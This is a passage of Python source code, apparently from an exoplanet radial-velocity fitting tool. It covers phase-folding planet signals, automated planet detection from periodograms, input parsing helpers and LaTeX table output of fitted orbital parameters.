def run_command_with_timeout_old(args, secs, output=False, pipe=False): # set output=True if you need to save the output
proc = Popen(args, shell=True, preexec_fn=os.setsid, stdout=PIPE)
proc_thread = Thread(target=proc.wait)
proc_thread.start()
proc_thread.join(secs)
text = proc.communicate()[0]
flag = 1
if proc_thread.is_alive():
try:
os.killpg(proc.pid, signal.SIGTERM)
except OSError:
print('Process #{} killed after {} seconds'.format(proc.pid, secs))
flag = -1
#text = '0 0 0 0'
return text.decode('utf-8'),flag
#return proc, flag , text.decode('utf-8')
return text.decode('utf-8'),flag
def phase_RV_planet_signal(obj,planet):
if obj.npl ==0 or len(obj.fit_results.rv_model.jd) ==0:
return
else:
copied_obj = dill.copy(obj)
if(copied_obj.mod_dynamical):
copied_obj.mod_dynamical = False
index = planet - 1
############################################
############# here is the trick! ##########
############################################
pp0 = copied_obj.params.planet_params[7*index+0] # we define a variable to be the planet amplitude Kj
copied_obj.params.planet_params[7*index+0] = 0.0000001 # then we set Kj to be 0, i.e. remove the j-th planet signal
copied_obj.fitting(minimize_loglik=True, amoeba_starts=0,
outputfiles=[0,1,1],return_flag=False, npoints=int(obj.model_npoints),
# model_max=int(max(obj.fit_results.model_jd)-max(copied_obj.fit_results.rv_model.jd)),
# model_min=int(copied_obj.epoch -min(obj.fit_results.model_jd)))
model_max=int(copied_obj.model_max),
model_min=int(copied_obj.model_min))
# and we create the static Nplanet model for the data and the model curve
# now this model residuals will contain ONLY the j-th planet signal + the best fit residuals
copied_obj.params.planet_params[7*index+0] = pp0 # we restore Kj to its best fit value.
############################################
######### trick is over ##########
############################################
#print(copied_obj.params.planet_params[7*index+1])
#print((copied_obj.epoch- copied_obj.fit_results.rv_model.jd[0])% copied_obj.params.planet_params[7*index+1] )
############ phase fold fix for sparse model ######
model_time_phase = np.array( (copied_obj.fit_results.model_jd -copied_obj.fit_results.model_jd[0] + (copied_obj.fit_results.model_jd[0] - copied_obj.epoch) )%copied_obj.params.planet_params[7*index+1] )
model_shift = copied_obj.params.planet_params[7*index+1] - (copied_obj.fit_results.rv_model.jd[0] - copied_obj.epoch )%copied_obj.params.planet_params[7*index+1]
model_time_phase = (model_time_phase + model_shift)% copied_obj.params.planet_params[7*index+1]
sort = sorted(range(len(model_time_phase)), key=lambda k: model_time_phase[k])
model_time_phase = model_time_phase[sort]
#print(len(obj.fit_results.model),len(copied_obj.fit_results.model))
phased_model = obj.fit_results.model[sort] - copied_obj.fit_results.model[sort]
############ phase data ######
data_time_phase = np.array( (copied_obj.fit_results.rv_model.jd - copied_obj.fit_results.rv_model.jd[0])% copied_obj.params.planet_params[7*index+1] )
sort = sorted(range(len(data_time_phase)), key=lambda k: data_time_phase[k])
data_time_phase = data_time_phase[sort]
phased_data = copied_obj.fit_results.rv_model.o_c[sort]# - copied_obj.fit_results.rv_model.rvs[sort]
phased_data_err = copied_obj.fit_results.rv_model.rv_err[sort]
phased_data_idset = copied_obj.fit_results.idset[sort]
if copied_obj.doGP == True:
phased_data = phased_data - copied_obj.gp_model_data[0][sort]
model = [model_time_phase, phased_model]
data = [data_time_phase, phased_data, phased_data_err, phased_data_idset]
del copied_obj
#####################
obj.ph_data[planet-1] = data
obj.ph_model[planet-1] = model
return data, model
def find_planets(obj,fend=0.75):
power_levels = np.array([0.1,0.01,0.001])
# check if RV data is present
if obj.filelist.ndset <= 0:
return
# the first one on the data GLS
if obj.gls.power.max() <= obj.gls.powerLevel(obj.auto_fit_FAP_level):
return obj
else:
if obj.npl !=0:
for j in range(obj.npl):
obj.remove_planet(obj.npl-(j+1))
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls.hpstat["T0"]) )% (obj.gls.hpstat["P"]) )/ (obj.gls.hpstat["P"]) ) * 2*np.pi)
# obj.add_planet(obj.gls.hpstat["amp"],obj.gls.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.add_planet(obj.gls.hpstat["amp"],obj.gls.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(0,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj,fend=fend)
#now inspect the residuals
for i in range(1,int(obj.auto_fit_max_pl)):
if obj.gls_o_c.power.max() <= obj.gls_o_c.powerLevel(obj.auto_fit_FAP_level):
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
obj = run_gls_o_c(obj)
return obj
#elif (1/RV_per_res.hpstat["fbest"]) > 1.5:
else:
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls_o_c.hpstat["T0"]) )% (obj.gls_o_c.hpstat["P"]) )/ (obj.gls_o_c.hpstat["P"]) ) * 2*np.pi)
obj.add_planet(obj.gls_o_c.hpstat["amp"],obj.gls_o_c.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(i,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj,fend=fend)
#else:
# continue
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj,fend=fend)
return obj
def find_planets_old(obj):
# check if RV data is present
if obj.filelist.ndset <= 0:
return
# the first one on the data GLS
if obj.gls.power.max() <= obj.gls.powerLevel(obj.auto_fit_FAP_level):
return obj
else:
if obj.npl !=0:
for j in range(obj.npl):
obj.remove_planet(obj.npl-(j+1))
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls.hpstat["T0"]) )% (obj.gls.hpstat["P"]) )/ (obj.gls.hpstat["P"]) ) * 2*np.pi)
obj.add_planet(obj.gls.hpstat["amp"],obj.gls.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(0,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj)
#now inspect the residuals
for i in range(1,int(obj.auto_fit_max_pl)):
if obj.gls_o_c.power.max() <= obj.gls_o_c.powerLevel(obj.auto_fit_FAP_level):
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
obj = run_gls_o_c(obj)
return obj
#elif (1/RV_per_res.hpstat["fbest"]) > 1.5:
else:
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls_o_c.hpstat["T0"]) )% (obj.gls_o_c.hpstat["P"]) )/ (obj.gls_o_c.hpstat["P"]) ) * 2*np.pi)
obj.add_planet(obj.gls_o_c.hpstat["amp"],obj.gls_o_c.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(i,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj)
#else:
# continue
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj)
return obj
def run_gls(obj,fend =1.0,fbeg=10000):
#fbeg = abs(max(obj.fit_results.rv_model.jd)-min(obj.fit_results.rv_model.jd)) * 2.0
omega = 1/ np.logspace(np.log10(fend), np.log10(fbeg), num=int(1000))
if len(obj.fit_results.rv_model.jd) > 5:
RV_per = gls.Gls((obj.fit_results.rv_model.jd, obj.fit_results.rv_model.rvs, obj.fit_results.rv_model.rv_err),
fast=True, verbose=False, norm='ZK',ofac=10, fbeg=omega[-1], fend=omega[0],)
obj.gls = RV_per
else:
return obj
return obj
def run_gls_o_c(obj,fend =1.0,fbeg=10000, as_main = False):
#fbeg = abs(max(obj.fit_results.rv_model.jd)-min(obj.fit_results.rv_model.jd)) * 2.0
omega = 1/ np.logspace(np.log10(fend), np.log10(fbeg), num=int(1000))
if len(obj.fit_results.rv_model.jd) > 5:
RV_per_res = gls.Gls((obj.fit_results.rv_model.jd, obj.fit_results.rv_model.o_c, obj.fit_results.rv_model.rv_err),
fast=True, verbose=False, norm='ZK', ofac=10, fbeg=omega[-1], fend=omega[0],)
if as_main == False:
obj.gls_o_c = RV_per_res
elif as_main == True:
obj.gls = RV_per_res
else:
return obj
return obj
def is_float(n):
'''
Given a string n, verify if it expresses a valid float.
Casting n to string in case an object of type float or similar is given as an argument
'''
return re.match(r'^-?\d*(\.\d+)?(E-?\d+)?$', str(n))
# Given a float or string, verify if it expresses an integer. Possible to introduce upper and lower bounds and if the inequalities on either side should be strong or weak .
def is_int(s,bounded=[False,False],bounds=[0,0],equal=[False,False]):
if is_float(s): # if it is an int, it is certainly float as well
n=float(s) # we need n as a number, not as a string, for comparisons with bounds later
is_an_int=float(s).is_integer()
else:
is_an_int=False
# is_an_int now contains an information if s is an int, but without bounds. Let's introduce bounds:
if(is_an_int): # if it's not an int at all we don't need to check any further
if(bounded[0]): # if there is a lower bound let's apply it
if (n<bounds[0] or (not equal[0] and n==bounds[0])):
is_an_int=False
if(is_an_int): # if the lower bound returned False we don't need to check any further
if(bounded[1]): # if there is a lower bound let's apply it
if (n>bounds[1] or (not equal[1] and n==bounds[1])):
is_an_int=False
return is_an_int
# If save_wrong_lines is enabled we will save a string 'wrong_line' instead of this line and save indices at which this occurred, otherwise we will skip this line
def convert_array_to_float(a,save_wrong_lines=False):
converting_warnings=Warning_log([],'Converting array to float')
b=[]
if (save_wrong_lines):
wrong_indices=[]
for i in range(len(a)):
if not is_float(a[i]):
if not (save_wrong_lines):
converting_warnings.update_warning_list('Array passed to convert_array_to_float function should only contain floats! Line %d skipped'%(i+1))
else:
b.append('wrong_line')
wrong_indices=np.concatenate((wrong_indices,np.atleast_1d(i)))
else:
b.append(float(a[i]))
converting_warnings.print_warning_log()
if (save_wrong_lines):
return np.array(b),wrong_indices
else:
return np.array(b)
def convert_array_to_int(a, save_wrong_lines=False):
converting_warnings=Warning_log([],'Converting array to int')
b=[]
if (save_wrong_lines):
wrong_indices=[]
for i in range(len(a)):
if not is_int(a[i]):
if not (save_wrong_lines):
converting_warnings.update_warning_list('Array passed to convert_array_to_int function should only contain ints! Line %d skipped'%(i+1))
else:
b.append('wrong_line')
wrong_indices=np.concatenate((wrong_indices,np.atleast_1d(i)))
else:
b.append(int(a[i]))
converting_warnings.print_warning_log()
if (save_wrong_lines):
return np.array(b),wrong_indices
else:
return np.array(b)
#for convenient reading of the input file
def read_file_as_array_of_arrays(inputfile):
a=open(inputfile, 'r')
b=a.readlines() # b as array of strings
a.close()
c=[]
ic=0 # iterator for values in c
for i in range(len(b)):
b[i]=np.atleast_1d(b[i].split()) # turn a row of b into an array of arrays
c.append([]) # need to make a separate array so every element is of correct type
# convert each string that represents a float into float
for j in range(0,len(b[i])):
if (is_float(b[i][j])):
c[ic].append(float(b[i][j]))
elif not (b[i][j][-1]==':'): # ignore comments, which can be place by the user as strings which end with a collon, in the comments use underline instead of space or an error will arise
c[ic].append(b[i][j])
ic=ic+1
#c = np.array(c, dtype=float)
return c
#for convenient reading of the input file the second is a hack so the mcmc lnL line is skipped! TBFixed
def read_file_as_array_of_arrays_mcmc(inputfile):
a=open(inputfile, 'r')
b=a.readlines() # b as array of strings
a.close()
c=[]
ic=0 # iterator for values in c
for i in range(len(b)):
b[i]=np.atleast_1d(b[i].split()) # turn a row of b into an array of arrays
c.append([]) # need to make a separate array so every element is of correct type
# convert each string that represents a float into float
for j in range(1,len(b[i])):
if (is_float(b[i][j])):
c[ic].append(float(b[i][j]))
elif not (b[i][j][-1]==':'): # ignore comments, which can be place by the user as strings which end with a collon, in the comments use underline instead of space or an error will arise
c[ic].append(float(b[i][j]))
ic=ic+1
c = np.array(c, dtype=float)
return c
def verify_array_with_bounds(ar,bounds):
'''Verify if values of array ar fit withind declared bounds, if too many/too few bounds do as much as can be done'''
if (len(ar)<=len(bounds)):
num=len(ar) # number of values to check
elif (len(ar)>len(bounds)):
num=len(bounds) # number of values to check
verification=True # initial value
for i in range(num):
# check if some of the values doesn't fit in the bounds, if so return False
if (ar[i]<bounds[i][0] or ar[i]>bounds[i][1]):
verification=False
break
return verification
def latex_pl_param_table(obj, width = 10, precision = 2, asymmetric = False, file_name='test.tex', path='./', return_text=False):
if asymmetric != True:
text = '''
\\begin{table}[ht]
% \\begin{adjustwidth}{-4.0cm}{}
% \\resizebox{0.69\\textheight}{!}
% {\\begin{minipage}{1.1\\textwidth}
\centering
\caption{{}}
\label{table:}
\\begin{tabular}{lrrrrrrrr} % 2 columns
\hline\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''Parameter \hspace{0.0 mm}'''
for i in range(obj.npl):
text = text + '''& Planet %s '''%chr(98+i)
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
text = text + '''{0:{width}s}'''.format("$K$ [m\,s$^{-1}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i], max(np.abs(obj.param_errors.planet_params_errors[7*i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$P$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +1], max(np.abs(obj.param_errors.planet_params_errors[7*i +1])), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.hkl == False:
text = text + '''{0:{width}s}'''.format("$e$ ", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +2], max(np.abs(obj.param_errors.planet_params_errors[7*i +2])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +3], max(np.abs(obj.param_errors.planet_params_errors[7*i +3])), width = width, precision = precision)
text = text + '''\\\\
'''
else:
text = text + '''{0:{width}s}'''.format("$e sin(\omega)$ ", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.e_sinw[i], max(np.abs(obj.e_sinw_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$e cos(\omega)$", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.e_cosw[i], max(np.abs(obj.e_cosw_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
if obj.hkl == False:
text = text + '''{0:{width}s}'''.format("$M_{\\rm 0}$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +4], max(np.abs(obj.param_errors.planet_params_errors[7*i +4])), width = width, precision = precision)
text = text + '''\\\\
'''
else:
text = text + '''{0:{width}s}'''.format("$\lambda$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.lamb[i], max(np.abs(obj.lamb_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.mod_dynamical == True:
text = text + '''{0:{width}s}'''.format("$i$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +5], max(np.abs(obj.param_errors.planet_params_errors[7*i +5])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\Omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +6], max(np.abs(obj.param_errors.planet_params_errors[7*i +6])), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"] == True:
text = text + '''{0:{width}s}'''.format("$t_{\\rm 0}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.t0[i], max(np.abs(obj.t0_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Rad. [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.pl_rad[i], max(np.abs(obj.pl_rad_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$a$ [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.pl_a[i], max(np.abs(obj.pl_a_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$a$ [au]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.fit_results.a[i], 0, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$m \sin i$ [$M_{\\rm jup}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.fit_results.mass[i], 0, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$t_{\omega}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format((float(obj.epoch) - (np.radians(obj.params.planet_params[7*i + 4])/(2*np.pi))*obj.params.planet_params[7*i + 1] ), 0, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"]== True:
text = text + '''{0:{width}s}'''.format("RV lin. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.params.linear_trend),float(max(np.abs(obj.param_errors.linear_trend_error))) , width = 30, precision = 6)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("RV quad. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.rv_quadtr),float(max(np.abs(obj.rv_quadtr_err))) , width = 30, precision = 6)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.params.offsets[i]), float(max(np.abs(obj.param_errors.offset_errors[i]))), width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.params.jitters[i]), float(max(np.abs(obj.param_errors.jitter_errors[i]))), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"]== True:
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm off}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.tra_off[i]), float(max(np.abs(obj.tra_off_err[i]))), width = width, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm jit}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.tra_jitt[i]), float(max(np.abs(obj.tra_jitt_err[i]))), width = width, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.doGP == True:
if obj.gp_kernel == 'RotKernel':
for i in range(4):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_rot_str[i]), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.GP_rot_params[i]), float(max(np.abs(obj.param_errors.GP_params_errors[i]))), width = width, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
elif obj.gp_kernel == 'SHOKernel':
for i in range(3):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_sho_str[i]), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.GP_sho_params[i]), float(max(np.abs(obj.param_errors.GP_params_errors[i]))), width = width, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\chi^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\chi_{\\nu}^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.reduced_chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$rms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.rms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$wrms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.wrms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$-\ln\mathcal{L}$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.loglik), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("N$_{\\rm RV}$ data", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(len(obj.fit_results.jd), width = width, precision = 0)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Epoch", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(obj.epoch, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''
\end{tabular}
% \end{minipage}}
% \end{adjustwidth}
%\\tablefoot{\small }
\end{table}
'''
elif asymmetric == True:
text = '''
\\begin{table}[ht]
% \\begin{adjustwidth}{-4.0cm}{}
% \\resizebox{0.69\\textheight}{!}
% {\\begin{minipage}{1.1\\textwidth}
\centering
\caption{{}}
\label{table:}
\\begin{tabular}{lrrrrrrrr} % 2 columns
\hline\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''Parameter \hspace{0.0 mm}'''
for i in range(obj.npl):
text = text + '''& Planet %s '''%chr(98+i)
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
text = text + '''{0:{width}s}'''.format("$K$ [m\,s$^{-1}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i], obj.param_errors.planet_params_errors[7*i][0], obj.param_errors.planet_params_errors[7*i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$P$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +1], obj.param_errors.planet_params_errors[7*i +1][0], obj.param_errors.planet_params_errors[7*i +1][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.hkl == False:
text = text + '''{0:{width}s}'''.format("$e$ ", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +2], obj.param_errors.planet_params_errors[7*i +2][0], obj.param_errors.planet_params_errors[7*i +2][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +3], obj.param_errors.planet_params_errors[7*i +3][0], obj.param_errors.planet_params_errors[7*i +3][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
else:
text = text + '''{0:{width}s}'''.format("$e sin(\omega)$ ", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$'''.format(obj.e_sinw[i], obj.e_sinw_err[i][0], obj.e_sinw_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$e cos(\omega)$", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$'''.format(obj.e_cosw[i], obj.e_cosw_err[i][0], obj.e_cosw_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
if obj.hkl == False:
text = text + '''{0:{width}s}'''.format("$M_{\\rm 0}$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +4], obj.param_errors.planet_params_errors[7*i +4][0], obj.param_errors.planet_params_errors[7*i +4][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
else:
text = text + '''{0:{width}s}'''.format("$\lambda$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.lamb[i], obj.lamb_err[i][0], obj.lamb_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\
'''
if obj.mod_dynamical == True:
text = text + '''{0:{width}s}'''.format("$i$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +5], obj.param_errors.planet_params_errors[7*i +5][0], obj.param_errors.planet_params_errors[7*i +5][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\Omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +6], obj.param_errors.planet_params_errors[7*i +6][0], obj.param_errors.planet_params_errors[7*i +6][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.type_fit["Transit"] == True:
text = text + '''{0:{width}s}'''.format("$t_{\\rm 0}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.t0[i], obj.t0_err[i][0], obj.t0_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("Rad. [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.pl_rad[i], obj.pl_rad_err[i][0], obj.pl_rad_err[i][1], width = width, width2 = 0, precision = precision)
